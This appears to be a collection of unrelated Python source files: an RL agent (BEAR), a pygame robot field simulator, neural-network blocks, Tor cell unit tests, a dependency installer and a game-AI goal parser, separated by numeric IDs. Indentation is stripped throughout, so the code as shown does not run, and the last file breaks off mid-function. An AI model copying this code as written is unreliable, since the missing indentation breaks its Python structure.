iou_avg_selections, std_avg_selections = self.calc_avg_iou_selections(iou_result_path_prefix=iou_result_path_prefix,
experiment_name=experiment_name)
print(iou_avg_selections)
print(std_avg_selections)
if __name__ == '__main__':
evaluation_config = {'targets': ['B5'],
'selections': [1,2,3,4,5,6,7,8,9,10],
'k-shot': [1,3,5,7,10]}
experiment_name = 'Meta_Learning_finetuned_1.0meta_lr_700meta_epochs_0.001model_lr_30inner_epochs_5shottest_20_ft_epochs_0.0001ft_lr'
fig_name_prefix = experiment_name+'_'+str(len(evaluation_config['selections']))+'_selections_'
lr_method = 'Meta_Learning'
meta_methods = ['BCE']
results = Results(lr_method=lr_method,evaluation_config=evaluation_config,
meta_methods=meta_methods,architecture='UNet')
if lr_method == 'Meta_Learning':
results.calc_avg_iou_selections_meta(experiment_name=experiment_name)
else:
results.calc_avg_iou_selections_transfer(experiment_name=experiment_name)
|
412217
|
import pygame
from networktables import NetworkTables
import math
print("Starting fieldsim")
# Init pygame
pygame.init()
gameDisplay = pygame.display.set_mode((1228,635))
pygame.display.set_caption('5024 Fieldsim')
clock = pygame.time.Clock()
# Init NT
NetworkTables.initialize(server='localhost')
sd = NetworkTables.getTable('SmartDashboard')
# Colors
blue = (0,0,180)
grey = (98,98,98)
white = (255,255,255)
# Robot size
rbt_size = (60,60)
rbt = pygame.Surface(rbt_size)
# Others
distance_mul = round(1228 / 16) # Image width / aprox field width (meters)
width_stretch = 0.89
# image loading
field_base = pygame.image.load("images/2020field-base.png")
field_top = pygame.image.load("images/2020field-top.png").convert_alpha()
rbt_surf = pygame.image.load("images/robot-sprite.png").convert_alpha()
rbt_surf = pygame.transform.scale(rbt_surf, rbt_size)
def getRobotPosition() -> tuple:
rbt_position = sd.getString("[DriveTrain] pose", "None").split(" ")
print(rbt_position)
if rbt_position[0] == "None":
return (100,0,45)
x = float(rbt_position[1][:-1])
y = float(rbt_position[3][:-2])
theta = float(rbt_position[-1][:-2])
return (x * distance_mul,y*distance_mul * width_stretch, theta)
def drawRegularPolygon(surface, color, theta, x, y, w,h):
x -= w/2
y-= h/2
hw = w/2
hh = h/2
# Rect points
points = [
(-hw,-hh),
(hw,-hh),
(hw,hh),
(-hw,hh)
]
rotated_point = [pygame.math.Vector2(p).rotate(theta) for p in points]
vCenter = pygame.math.Vector2((x ,y ))
rect_points = [(vCenter + p) for p in rotated_point]
pygame.draw.polygon(surface, color, rect_points)
def drawRobot(x,y,theta):
rbt = pygame.transform.rotate(rbt_surf, -theta)
gameDisplay.blit(rbt, (x - (rbt.get_width() / 2),y - (rbt.get_height() / 2)))
while True:
# Handle window close
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
quit()
# Clear the frame
gameDisplay.fill(white)
# Draw the field
gameDisplay.blit(field_base, (0,0))
# Draw the "robot"
x,y,theta = getRobotPosition()
# Shift position to match real field positioning
y += (635/2)
x += (60 + rbt_size[1] / 2)
# Draw the robot
drawRobot(x,y,theta)
# Add top of field
gameDisplay.blit(field_top, (0,0))
# Update the screen
pygame.display.update()
clock.tick(60)
pygame.quit()
quit()
|
412233
|
import mxnet as mx
from symbol_basic import *
# - - - - - - - - - - - - - - - - - - - - - - -
# Standard Dual Path Unit
def DualPathFactory(data, num_1x1_a, num_3x3_b, num_1x1_c, name, inc, G, _type='normal'):
kw = 3
kh = 3
pw = (kw-1)/2
ph = (kh-1)/2
# type
if _type is 'proj':
key_stride = 1
has_proj = True
if _type is 'down':
key_stride = 2
has_proj = True
if _type is 'normal':
key_stride = 1
has_proj = False
# PROJ
if type(data) is list:
data_in = mx.symbol.Concat(*[data[0], data[1]], name=('%s_cat-input' % name))
else:
data_in = data
if has_proj:
c1x1_w = BN_AC_Conv( data=data_in, num_filter=(num_1x1_c+2*inc), kernel=( 1, 1), stride=(key_stride, key_stride), name=('%s_c1x1-w(s/%d)' %(name, key_stride)), pad=(0, 0))
data_o1 = mx.symbol.slice_axis(data=c1x1_w, axis=1, begin=0, end=num_1x1_c, name=('%s_c1x1-w(s/%d)-split1' %(name, key_stride)))
data_o2 = mx.symbol.slice_axis(data=c1x1_w, axis=1, begin=num_1x1_c, end=(num_1x1_c+2*inc), name=('%s_c1x1-w(s/%d)-split2' %(name, key_stride)))
else:
data_o1 = data[0]
data_o2 = data[1]
# MAIN
c1x1_a = BN_AC_Conv( data=data_in, num_filter=num_1x1_a, kernel=( 1, 1), pad=( 0, 0), name=('%s_c1x1-a' % name))
c3x3_b = BN_AC_Conv( data=c1x1_a, num_filter=num_3x3_b, kernel=(kw, kh), pad=(pw, ph), name=('%s_c%dx%d-b' % (name,kw,kh)), stride=(key_stride,key_stride), num_group=G)
c1x1_c = BN_AC_Conv( data=c3x3_b, num_filter=(num_1x1_c+inc), kernel=( 1, 1), pad=( 0, 0), name=('%s_c1x1-c' % name))
c1x1_c1= mx.symbol.slice_axis(data=c1x1_c, axis=1, begin=0, end=num_1x1_c, name=('%s_c1x1-c-split1' % name))
c1x1_c2= mx.symbol.slice_axis(data=c1x1_c, axis=1, begin=num_1x1_c, end=(num_1x1_c+inc), name=('%s_c1x1-c-split2' % name))
# OUTPUTS
summ = mx.symbol.ElementWiseSum(*[data_o1, c1x1_c1], name=('%s_sum' % name))
dense = mx.symbol.Concat( *[data_o2, c1x1_c2], name=('%s_cat' % name))
return [summ, dense]
|
412242
|
class TextFeaturizer(object):
"""文本特征器,用于处理或从文本中提取特征。支持字符级的令牌化和转换为令牌索引列表
:param vocab_filepath: 令牌索引转换词汇表的文件路径
:type vocab_filepath: str
"""
def __init__(self, vocab_filepath):
self._vocab_dict, self._vocab_list = self._load_vocabulary_from_file(
vocab_filepath)
def featurize(self, text):
"""将文本字符串转换为字符级的令牌索引列表
:param text: 文本
:type text: str
:return:字符级令牌索引列表
:rtype: list
"""
tokens = self._char_tokenize(text)
token_indices = []
for token in tokens:
# 跳过词汇表不存在的字符
if token not in self._vocab_list:continue
token_indices.append(self._vocab_dict[token])
return token_indices
@property
def vocab_size(self):
"""返回词汇表大小
:return: Vocabulary size.
:rtype: int
"""
return len(self._vocab_list)
@property
def vocab_list(self):
"""返回词汇表的列表
:return: Vocabulary in list.
:rtype: list
"""
return self._vocab_list
def _char_tokenize(self, text):
"""Character tokenizer."""
return list(text.strip())
def _load_vocabulary_from_file(self, vocab_filepath):
"""Load vocabulary from file."""
vocab_lines = []
with open(vocab_filepath, 'r', encoding='utf-8') as file:
vocab_lines.extend(file.readlines())
vocab_list = [line.split('\t')[0].replace('\n', '') for line in vocab_lines]
vocab_dict = dict(
[(token, id) for (id, token) in enumerate(vocab_list)])
return vocab_dict, vocab_list
|
412468
|
class Solution:
def newInteger(self, n):
base9 = ""
while n:
base9 += str(n % 9)
n //= 9
return int(base9[::-1])
|
412474
|
import os
import torch
import numpy as np
from torch.distributions.normal import Normal
from torch.nn.functional import mse_loss
from copy import deepcopy
from rlil.environments import State, action_decorator, Action
from rlil.initializer import get_writer, get_device, get_replay_buffer
from rlil import nn
from .base import Agent, LazyAgent
class BEAR(Agent):
"""
Bootstrapping error accumulation reduction (BEAR)
BEAR is an algorithm to train an agent from a fixed batch.
Unlike BCQ, BEAR doesn't constraint the distribution of the
learned policy to be close to the behavior policy.
Instead, BEAR restricts the policy to ensure that the actions of
the policy lies in the support of the training distribution.
https://arxiv.org/abs/1906.00949
This implementation is based on: https://github.com/aviralkumar2907/BEAR
Args:
qs (EnsembleQContinuous): An Approximation of the continuous action Q-functions.
encoder (BcqEncoder): An approximation of the encoder.
decoder (BcqDecoder): An approximation of the decoder.
policy (SoftDeterministicPolicy): An Approximation of a soft deterministic policy.
kernel_type: ("gaussian"|"laplacian") Kernel type used for computation of MMD
num_samples_match (int): Number of samples used for computing sampled MMD
mmd_sigma (float): Parameter for computation of MMD.
discount_factor (float): Discount factor for future rewards.
minibatch_size (int): The number of experiences to sample in each training update.
lambda_q (float): Weight for soft clipped double q-learning
_lambda (float): Weight for actor loss with mmd
"""
def __init__(self,
qs,
encoder,
decoder,
policy,
kernel_type="laplacian",
num_samples_match=5,
mmd_sigma=10.0,
discount_factor=0.99,
lambda_q=0.75,
_lambda=0.4,
delta_conf=0.1,
minibatch_size=32,
):
# objects
self.qs = qs
self.encoder = encoder
self.decoder = decoder
self.policy = policy
self.replay_buffer = get_replay_buffer()
self.device = get_device()
self.writer = get_writer()
# hyperparameters
self.kernel_type = kernel_type
self.mmd_sigma = mmd_sigma
self.num_samples_match = num_samples_match
self.minibatch_size = minibatch_size
self.discount_factor = discount_factor
self.lambda_q = lambda_q
self._lambda = _lambda
self.delta_conf = delta_conf
# lagrange multipliers for maintaining support matching at all times
self.log_lagrange2 = torch.randn(
(), requires_grad=True, device=self.device)
self.lagrange2_opt = torch.optim.Adam([self.log_lagrange2, ], lr=1e-3)
# private
self._train_count = 0
def act(self, states, rewards):
with torch.no_grad():
states = State(states.features.repeat(10, 1).to(self.device))
policy_actions = Action(self.policy.no_grad(states)[0])
q1_values = self.qs.q1(states, policy_actions)
ind = q1_values.argmax(0).item()
return policy_actions[ind].to("cpu")
def train(self):
self._train_count += 1
# sample transitions from buffer
(states, actions, rewards,
next_states, _, _) = self.replay_buffer.sample(self.minibatch_size)
# Train the Behaviour cloning policy to be able to
# take more than 1 sample for MMD
mean, log_var = self.encoder(
states.to(self.device), actions.to(self.device))
z = mean + (0.5 * log_var).exp() * torch.randn_like(log_var)
vae_actions = Action(self.decoder(states, z))
vae_mse = mse_loss(actions.features, vae_actions.features)
vae_kl = nn.kl_loss_vae(mean, log_var)
vae_loss = (vae_mse + 0.5 * vae_kl)
self.decoder.reinforce(vae_loss)
self.encoder.reinforce()
self.writer.add_scalar('loss/vae/mse', vae_mse.detach())
self.writer.add_scalar('loss/vae/kl', vae_kl.detach())
# train critic
with torch.no_grad():
# Duplicate next state 10 times
next_states_10 = State(torch.repeat_interleave(
next_states.features, 10, 0).to(self.device))
# Compute value of perturbed actions sampled from the VAE
next_vae_actions_10 = Action(self.decoder(next_states_10))
next_actions_10 = Action(
self.policy.target(next_states_10, next_vae_actions_10))
# (batch x 10) x num_q
qs_targets = self.qs.target(next_states_10, next_actions_10)
# Soft Clipped Double Q-learning
# (batch x 10) x 1
q_targets = self.lambda_q * qs_targets.min(1)[0] \
+ (1. - self.lambda_q) * qs_targets.max(1)[0]
# Take max over each action sampled from the VAE
# batch x 1
q_targets = q_targets.reshape(
self.minibatch_size, -1).max(1)[0].reshape(-1, 1)
q_targets = rewards.reshape(-1, 1) + \
self.discount_factor * q_targets * \
next_states.mask.float().reshape(-1, 1)
current_qs = self.qs(states, actions) # batch x num_q
repeated_q_targets = torch.repeat_interleave(
q_targets, current_qs.shape[1], 1)
q_loss = mse_loss(current_qs, repeated_q_targets)
self.qs.reinforce(q_loss)
# train policy
# batch x num_samples_match x d
vae_actions, raw_vae_actions = \
self.decoder.decode_multiple(states, self.num_samples_match)
actor_actions, raw_actor_actions = \
self.policy.sample_multiple(states, self.num_samples_match)
if self.kernel_type == 'gaussian':
mmd = nn.mmd_gaussian(
raw_vae_actions, raw_actor_actions, sigma=self.mmd_sigma)
else:
mmd = nn.mmd_laplacian(
raw_vae_actions, raw_actor_actions, sigma=self.mmd_sigma)
# Update through TD3 style
# (batch x num_samples_match) x d
repeated_states = torch.repeat_interleave(
states.features.unsqueeze(1),
self.num_samples_match, 1).view(-1, states.shape[1])
repeated_actions = \
actor_actions.contiguous().view(-1, actor_actions.shape[2])
# (batch x num_samples_match) x num_q
critic_qs = self.qs(State(repeated_states), Action(repeated_actions))
# batch x num_samples_match x num_q
critic_qs = \
critic_qs.view(-1, self.num_samples_match, critic_qs.shape[1])
critic_qs = critic_qs.mean(1) # batch x num_q
std_q = torch.std(critic_qs, dim=-1, keepdim=False,
unbiased=False) # batch
critic_qs = critic_qs.min(1)[0] # batch
# Do support matching with a warmstart which happens to be reasonable
# around epoch 20 during training
if self._train_count >= 20:
actor_loss = (-critic_qs + self._lambda *
(np.sqrt((1 - self.delta_conf) / self.delta_conf)) *
std_q + self.log_lagrange2.exp().detach() * mmd).mean()
else:
actor_loss = (self.log_lagrange2.exp() * mmd).mean()
std_loss = self._lambda * (np.sqrt((1 - self.delta_conf) /
self.delta_conf)) * std_q.detach().mean()
self.policy.reinforce(actor_loss)
# update lagrange multipliers
thresh = 0.05
lagrange_loss = (self.log_lagrange2.exp() *
(mmd - thresh).detach()).mean()
self.lagrange2_opt.zero_grad()
(-lagrange_loss).backward()
self.lagrange2_opt.step()
self.log_lagrange2.data.clamp_(min=-5.0, max=10.0)
self.writer.add_scalar('loss/mmd', mmd.detach().mean())
self.writer.add_scalar('loss/actor', actor_loss.detach())
self.writer.add_scalar('loss/qs', q_loss.detach())
self.writer.add_scalar('loss/std', std_loss.detach())
self.writer.add_scalar('loss/lagrange2', lagrange_loss.detach())
self.writer.add_scalar('critic_qs', critic_qs.detach().mean())
self.writer.add_scalar('std_q', std_q.detach().mean())
self.writer.add_scalar('lagrange2', self.log_lagrange2.exp().detach())
self.writer.train_steps += 1
def should_train(self):
return True
def make_lazy_agent(self, evaluation=False, store_samples=True):
policy_model = deepcopy(self.policy.model)
qs_model = deepcopy(self.qs.model)
return BearLazyAgent(policy_model.to("cpu"),
qs_model.to("cpu"),
evaluation=evaluation,
store_samples=store_samples)
def load(self, dirname):
for filename in os.listdir(dirname):
if filename == 'policy.pt':
self.policy.model = torch.load(os.path.join(
dirname, filename), map_location=self.device)
if filename in ('qs.pt'):
self.qs.model = torch.load(os.path.join(dirname, filename),
map_location=self.device)
if filename in ('encoder.pt'):
self.encoder.model = torch.load(os.path.join(dirname, filename),
map_location=self.device)
if filename in ('decoder.pt'):
self.decoder.model = torch.load(os.path.join(dirname, filename),
map_location=self.device)
class BearLazyAgent(LazyAgent):
"""
Agent class for sampler.
"""
def __init__(self,
policy_model,
qs_model,
*args, **kwargs):
self._policy_model = policy_model
self._qs_model = qs_model
super().__init__(*args, **kwargs)
if self._evaluation:
self._policy_model.eval()
self._qs_model.eval()
def act(self, states, reward):
super().act(states, reward)
self._states = states
with torch.no_grad():
states = State(states.features.repeat(10, 1))
policy_actions = Action(self._policy_model(states)[0])
q1_values = self._qs_model.q1(states, policy_actions)
ind = q1_values.argmax(0).item()
self._actions = policy_actions[ind].to("cpu")
return self._actions
|
412524
|
import argparse
import subprocess
import glob
import re
import os
parser = argparse.ArgumentParser(description='Installing ThirdParty')
parser.add_argument('--all', help='install all dependencies', default=True)
parser.add_argument('--reinstall_all',
help='re-install all dependencies', default=False)
parser.add_argument(
'--reinstall', help='reinstall one library', type=str, default="")
def install_all_deps():
subprocess.call("./thirdparty/rules/cmake.sh")
for rule in glob.glob("./thirdparty/rules/*.sh"):
subprocess.call("./" + rule, shell=True)
def reinstall_all_deps():
to_remove = str("./thirdparty/all/")
if os.path.exists(to_remove):
subprocess.call(str("rm -r " + to_remove), shell=True)
install_all_deps()
def reinstall_one_lib(lib):
all_rules = glob.glob("./thirdparty/rules/*.sh")
names = []
for rule in all_rules:
names.append(re.search('%s(.*)%s' %
('./thirdparty/rules/', '.sh'), rule).group(1))
if lib not in names:
print('Error no rules found for ' + lib)
else:
to_remove = str("./thirdparty/all/" + lib)
if os.path.exists(to_remove):
subprocess.call(str("rm -r " + to_remove), shell=True)
subprocess.call("./thirdparty/rules/" + lib + ".sh", shell=True)
args = parser.parse_args()
if args.reinstall != "":
reinstall_one_lib(args.reinstall)
elif args.reinstall_all:
reinstall_all_deps()
else:
install_all_deps()
|
412559
|
import struct
import unittest
from collections import OrderedDict
from oppy.cell.fixedlen import (
FixedLenCell,
Create2Cell,
Created2Cell,
CreatedFastCell,
CreatedCell,
CreateFastCell,
CreateCell,
DestroyCell,
EncryptedCell,
NetInfoCell,
PaddingCell,
)
from oppy.cell.util import TLVTriple
from oppy.tests.integration.cell.cellbase import FixedLenTestBase
CIRC_ID = 1
# Unit tests and constants for Create2Cell
CREATE2_CMD = 10
CREATE2_NTOR_HTYPE = 2
CREATE2_NTOR_HLEN = 84
CREATE2_NTOR_HDATA_DUMMY = "\x00" * CREATE2_NTOR_HLEN
create2_bytes_good = struct.pack(
"!HBHH{}s".format(CREATE2_NTOR_HLEN),
CIRC_ID, CREATE2_CMD,
CREATE2_NTOR_HTYPE, CREATE2_NTOR_HLEN, CREATE2_NTOR_HDATA_DUMMY,
)
create2_bytes_good_padded = FixedLenCell.padCellBytes(create2_bytes_good)
assert len(create2_bytes_good_padded) == 512
create2_parse_bad_htype = struct.pack(
"!HBHH{}s".format(CREATE2_NTOR_HLEN),
CIRC_ID, CREATE2_CMD,
# ntor should be 2
1, CREATE2_NTOR_HLEN, CREATE2_NTOR_HDATA_DUMMY,
)
create2_parse_bad_htype = FixedLenCell.padCellBytes(create2_parse_bad_htype)
assert len(create2_parse_bad_htype) == 512
create2_parse_bad_hlen = struct.pack(
"!HBHH{}s".format(CREATE2_NTOR_HLEN),
CIRC_ID, CREATE2_CMD,
# hlen should be 84 for ntor
CREATE2_NTOR_HTYPE, 83, CREATE2_NTOR_HDATA_DUMMY,
)
create2_parse_bad_hlen = FixedLenCell.padCellBytes(create2_parse_bad_hlen)
assert len(create2_parse_bad_hlen) == 512
# htype should be 2 for ntor
create2_make_bad_htype = (CIRC_ID, 1, CREATE2_NTOR_HLEN,
CREATE2_NTOR_HDATA_DUMMY)
# htype should be int not str
create2_make_bad_htype_2 = (CIRC_ID, str(CREATE2_NTOR_HTYPE),
CREATE2_NTOR_HLEN,
CREATE2_NTOR_HDATA_DUMMY)
# hlen should be 84 for ntor
create2_make_bad_hlen = (CIRC_ID, CREATE2_NTOR_HTYPE, 83,
CREATE2_NTOR_HDATA_DUMMY)
# len(hdata) == hlen must be true
create2_make_bad_hdata = (CIRC_ID, CREATE2_NTOR_HTYPE, CREATE2_NTOR_HLEN,
"\x00")
class Create2CellTests(FixedLenTestBase, unittest.TestCase):
# NOTE: Twisted unfortunately does not support `setUpClass()`, so we
# do actually need to call this before every test
def setUp(self):
self.cell_constants = {
'cell-bytes-good': create2_bytes_good_padded,
'cell-type': Create2Cell,
'cell-bytes-good-nopadding': create2_bytes_good,
}
self.cell_header = OrderedDict()
self.cell_header['circ_id'] = CIRC_ID
self.cell_header['cmd'] = CREATE2_CMD
self.cell_header['link_version'] = 3
self.cell_attributes = OrderedDict()
self.cell_attributes['htype'] = CREATE2_NTOR_HTYPE
self.cell_attributes['hlen'] = CREATE2_NTOR_HLEN
self.cell_attributes['hdata'] = CREATE2_NTOR_HDATA_DUMMY
self.bad_parse_inputs = (create2_parse_bad_htype,
create2_parse_bad_hlen)
self.bad_make_inputs = (create2_make_bad_htype,
create2_make_bad_htype_2,
create2_make_bad_hlen,
create2_make_bad_hdata)
self.encrypted = False
# Unit tests and constants for Created2Cell
# we can reuse most of the values from Create2Cell for some constants
CREATED2_CMD = 11
created2_bytes_good = struct.pack(
"!HBH{}s".format(CREATE2_NTOR_HLEN),
CIRC_ID, CREATED2_CMD,
CREATE2_NTOR_HLEN, CREATE2_NTOR_HDATA_DUMMY,
)
created2_bytes_good_padded = FixedLenCell.padCellBytes(created2_bytes_good)
assert len(created2_bytes_good_padded) == 512
created2_parse_bad_hlen = struct.pack(
"!HBH{}s".format(CREATE2_NTOR_HLEN),
CIRC_ID, CREATE2_CMD,
# hlen should be 84 for ntor
83, CREATE2_NTOR_HDATA_DUMMY,
)
created2_parse_bad_hlen = FixedLenCell.padCellBytes(created2_parse_bad_hlen)
assert len(created2_parse_bad_hlen) == 512
# hlen should be 84 for ntor
created2_make_bad_hlen = (CIRC_ID, 83, CREATE2_NTOR_HDATA_DUMMY)
# len(hdata) == hlen must be true
created2_make_bad_hdata = (CIRC_ID, CREATE2_NTOR_HLEN, "\x00")
class Created2CellTests(FixedLenTestBase, unittest.TestCase):
def setUp(self):
self.cell_constants = {
'cell-bytes-good': created2_bytes_good_padded,
'cell-type': Created2Cell,
'cell-bytes-good-nopadding': created2_bytes_good,
}
self.cell_header = OrderedDict()
self.cell_header['circ_id'] = CIRC_ID
self.cell_header['cmd'] = CREATED2_CMD
self.cell_header['link_version'] = 3
self.cell_attributes = OrderedDict()
self.cell_attributes['hlen'] = CREATE2_NTOR_HLEN
self.cell_attributes['hdata'] = CREATE2_NTOR_HDATA_DUMMY
self.bad_parse_inputs = (created2_parse_bad_hlen,)
self.bad_make_inputs = (created2_make_bad_hlen,
created2_make_bad_hdata,)
self.encrypted = False
# for unimplemented cells, just verify they fail when we try to create them
class CreatedFastCellTests(unittest.TestCase):
def test_init_fail(self):
self.assertRaises(NotImplementedError, CreatedFastCell, 'dummy')
class CreatedCellTests(unittest.TestCase):
def test_init_fail(self):
self.assertRaises(NotImplementedError, CreatedCell, 'dummy')
class CreateFastCellTests(unittest.TestCase):
def test_init_fail(self):
self.assertRaises(NotImplementedError, CreateFastCell, 'dummy')
class CreateCellTests(unittest.TestCase):
def test_init_fail(self):
self.assertRaises(NotImplementedError, CreateCell, 'dummy')
# Unit tests and constants for DestroyCell
DESTROY_CMD = 4
destroy_bytes_good = struct.pack(
"!HBB",
CIRC_ID, DESTROY_CMD,
0,
)
destroy_bytes_good_padded = FixedLenCell.padCellBytes(destroy_bytes_good)
assert len(destroy_bytes_good_padded) == 512
destroy_parse_bad_reason = struct.pack(
"!HBB",
CIRC_ID, DESTROY_CMD,
# 13 is not a valid reason
13,
)
destroy_parse_bad_reason = FixedLenCell.padCellBytes(destroy_parse_bad_reason)
assert len(destroy_parse_bad_reason) == 512
destroy_make_bad_reason = (CIRC_ID, 13)
encrypted_bytes_good = struct.pack(
"!HBB",
CIRC_ID, DESTROY_CMD,
0,
)
destroy_bytes_good_padded = FixedLenCell.padCellBytes(destroy_bytes_good)
assert len(destroy_bytes_good_padded) == 512
class DestroyCellTests(FixedLenTestBase, unittest.TestCase):
def setUp(self):
self.cell_constants = {
'cell-bytes-good': destroy_bytes_good_padded,
'cell-type': DestroyCell,
'cell-bytes-good-nopadding': destroy_bytes_good,
}
self.cell_header = OrderedDict()
self.cell_header['circ_id'] = CIRC_ID
self.cell_header['cmd'] = DESTROY_CMD
self.cell_header['link_version'] = 3
self.cell_attributes = OrderedDict()
self.cell_attributes['reason'] = 0
self.bad_parse_inputs = (destroy_parse_bad_reason,)
self.bad_make_inputs = (destroy_make_bad_reason,)
self.encrypted = False
# Unit tests and constants for EncryptedCell
# since the payload of an encrypted cell prior to decryption is, from oppy's
# perspective, just a black box, the only type of "bad" payload data is
# a payload passed to "make()" that is too large for a relay cell
RELAY_CMD = 3
encrypted_bytes_good = struct.pack(
"!HB57s",
CIRC_ID, RELAY_CMD,
"\x00" * 509,
)
encrypted_bytes_good_padded = FixedLenCell.padCellBytes(encrypted_bytes_good)
assert len(encrypted_bytes_good_padded) == 512
encrypted_make_bad_payload_len_long = (CIRC_ID, "\x00" * 510)
encrypted_make_bad_payload_len_short = (CIRC_ID, "\x00" * 508)
class EncryptedCellTests(FixedLenTestBase, unittest.TestCase):
def setUp(self):
self.cell_constants = {
'cell-bytes-good': encrypted_bytes_good_padded,
'cell-type': EncryptedCell,
'cell-bytes-good-nopadding': encrypted_bytes_good,
}
self.cell_header = OrderedDict()
self.cell_header['circ_id'] = CIRC_ID
self.cell_header['cmd'] = RELAY_CMD
self.cell_header['link_version'] = 3
self.cell_attributes = {'enc_payload': "\x00" * 509, }
self.bad_parse_inputs = ()
self.bad_make_inputs = (encrypted_make_bad_payload_len_long,
encrypted_make_bad_payload_len_short,)
self.encrypted = True
def test_getBytes_trimmed(self):
# encrypted cells don't know what's in their payload, so
# "trimmed" arg doesn't make sense for them
pass
# NetInfoCell (IPv4 type/length/value) unittests and constant values
NETINFO_CMD = 8
# IPv4 type type/length/value
netinfo_bytes_good = struct.pack(
'!HBIBB4sBBB4s',
CIRC_ID, NETINFO_CMD,
0, 4, 4, "\x7f\x00\x00\x01", # 127.0.0.1
1, 4, 4, "\x7f\x00\x00\x01",
)
netinfo_bytes_good_padded = FixedLenCell.padCellBytes(netinfo_bytes_good)
assert len(netinfo_bytes_good_padded) == 512
netinfo_parse_bad_num_addresses = netinfo_bytes_good_padded[:13]
netinfo_parse_bad_num_addresses += struct.pack('!B', 200)
netinfo_parse_bad_num_addresses += netinfo_bytes_good_padded[14:]
assert len(netinfo_parse_bad_num_addresses) == 512
netinfo_make_bad_num_addresses = (CIRC_ID, TLVTriple(u'127.0.0.1'),
[TLVTriple(u'127.0.0.1') for i in xrange(50)])
class NetInfoCellIPv4Tests(FixedLenTestBase, unittest.TestCase):
def setUp(self):
self.cell_constants = {
'cell-bytes-good': netinfo_bytes_good_padded,
'cell-type': NetInfoCell,
'cell-bytes-good-nopadding': netinfo_bytes_good,
}
self.cell_header = OrderedDict()
self.cell_header['circ_id'] = CIRC_ID
self.cell_header['cmd'] = NETINFO_CMD
self.cell_header['link_version'] = 3
self.cell_attributes = OrderedDict()
self.cell_attributes['other_or_address'] = TLVTriple(u'127.0.0.1')
self.cell_attributes['this_or_addresses'] = [TLVTriple(u'127.0.0.1')]
self.cell_attributes['timestamp'] = struct.pack('!I', 0)
self.bad_parse_inputs = (netinfo_parse_bad_num_addresses,)
self.bad_make_inputs = (netinfo_make_bad_num_addresses,)
self.encrypted = False
# IPv6 type type/length/value
netinfo_bytes_good_ipv6 = struct.pack(
'!HBIBB16sBBB16s',
CIRC_ID, NETINFO_CMD,
0, 6, 16, "\xfe\x80\x00\x00\x00\x00\x00\x00\x02\x02\xb3\xff\xfe\x1e\x83)",
1, 6, 16, "\xfe\x80\x00\x00\x00\x00\x00\x00\x02\x02\xb3\xff\xfe\x1e\x83)",
)
netinfo_bytes_good_padded_ipv6 = FixedLenCell.padCellBytes(netinfo_bytes_good_ipv6)
assert len(netinfo_bytes_good_padded_ipv6) == 512
class NetInfoCellIPv6Tests(FixedLenTestBase, unittest.TestCase):
def setUp(self):
self.cell_constants = {
'cell-bytes-good': netinfo_bytes_good_padded_ipv6,
'cell-type': NetInfoCell,
'cell-bytes-good-nopadding': netinfo_bytes_good_ipv6,
}
self.cell_header = OrderedDict()
self.cell_header['circ_id'] = CIRC_ID
self.cell_header['cmd'] = NETINFO_CMD
self.cell_header['link_version'] = 3
self.cell_attributes = OrderedDict()
self.cell_attributes['other_or_address'] = TLVTriple(u'fe80:0000:0000:0000:0202:b3ff:fe1e:8329')
self.cell_attributes['this_or_addresses'] = [TLVTriple(u'fe80:0000:0000:0000:0202:b3ff:fe1e:8329')]
self.cell_attributes['timestamp'] = struct.pack('!I', 0)
self.bad_parse_inputs = ()
self.bad_make_inputs = ()
self.encrypted = False
# PaddingCell unittests and constant values
PADDING_CMD = 0
padding_bytes_good = struct.pack(
'!HB509s',
CIRC_ID, PADDING_CMD,
"\x00" * 509,
)
padding_bytes_good_padded = padding_bytes_good
assert len(padding_bytes_good_padded) == 512
class PaddingCellTests(FixedLenTestBase, unittest.TestCase):
def setUp(self):
self.cell_constants = {
'cell-bytes-good': padding_bytes_good_padded,
'cell-type': PaddingCell,
'cell-bytes-good-nopadding': padding_bytes_good,
}
self.cell_header = OrderedDict()
self.cell_header['circ_id'] = CIRC_ID
self.cell_header['cmd'] = PADDING_CMD
self.cell_header['link_version'] = 3
# padding cells don't have any attributes, and they don't really
# have 'bad' inputs, as the payload must be ignored
self.cell_attributes = {}
self.bad_parse_inputs = ()
self.bad_make_inputs = ()
self.encrypted = False
|
412598
|
from globals import *
import life as lfe
import alife
import logging
import os
def add_goal(life, goal_name, desire, require, tier, loop_until, set_flags):
if tier == 'relaxed':
_tier = TIER_RELAXED
elif tier == 'survival':
_tier = TIER_SURVIVAL
elif tier == 'urgent':
_tier = TIER_URGENT
elif tier == 'combat':
_tier = TIER_COMBAT
elif tier == 'tactic':
_tier = TIER_TACTIC
else:
logging.error('Invalid tier in life type \'%s\': %s' % (life['species'], tier))
_tier = TIER_RELAXED
life['goap_goals'][goal_name] = {'desire': desire.split(','),
'require': require.split(','),
'tier': _tier,
'loop_until': loop_until.split(','),
'set_flags': set_flags.split(',')}
#logging.debug('Created goal: %s' % goal_name)
def remove_goal(life, goal_name):
logging.warning('TODO: Remove blacklist.')
if not goal_name in life['goap_goals_blacklist']:
life['goap_goals_blacklist'].append(goal_name)
def add_action(life, action_name, desire, require, satisfies, loop_until, execute, set_flags, non_critical):
life['goap_actions'][action_name] = {'desire': desire.split(','),
'require': require.split(','),
'satisfies': satisfies.split(','),
'loop_until': loop_until.split(','),
'execute': execute,
'set_flags': set_flags.split(','),
'non_critical': non_critical == 'true'}
#logging.debug('Created action: %s' % action_name)
def parse_goap(life):
logging.debug('Parsing GOAP for life type \'%s\'' % life['species'])
_action_name = ''
_goal_name = ''
_desire = ''
_require = ''
_tier = ''
_loop_until = ''
_set_flags = ''
_execute = ''
_satisfies = ''
_non_critical = False
with open(os.path.join(LIFE_DIR, life['species']+'.goap'), 'r') as _goap:
for line in _goap.readlines():
line = line.rstrip().lower()
if line.startswith('[goal_'):
_goal_name = line.split('[')[1].split(']')[0].partition('_')[2]
elif line.startswith('[action_'):
_action_name = line.split('[')[1].split(']')[0].partition('_')[2]
elif line.startswith('tier'):
_tier = line.partition(':')[2].strip()
elif line.startswith('desire'):
_desire = line.partition(':')[2].strip()
elif line.startswith('require'):
_require = line.partition(':')[2].strip()
elif line.startswith('set_flags'):
_set_flags = line.partition(':')[2].strip()
elif line.startswith('loop_until'):
_loop_until = line.partition(':')[2].strip()
elif line.startswith('execute'):
_execute = line.partition(':')[2].strip()
elif line.startswith('satisfies'):
_satisfies = line.partition(':')[2].strip()
elif line.startswith('non_critical'):
_non_critical = line.partition(':')[2].strip()
elif not line:
if _goal_name:
add_goal(life, _goal_name, _desire, _require, _tier, _loop_until, _set_flags)
_goal_name = ''
_desire = ''
_require = ''
_tier = ''
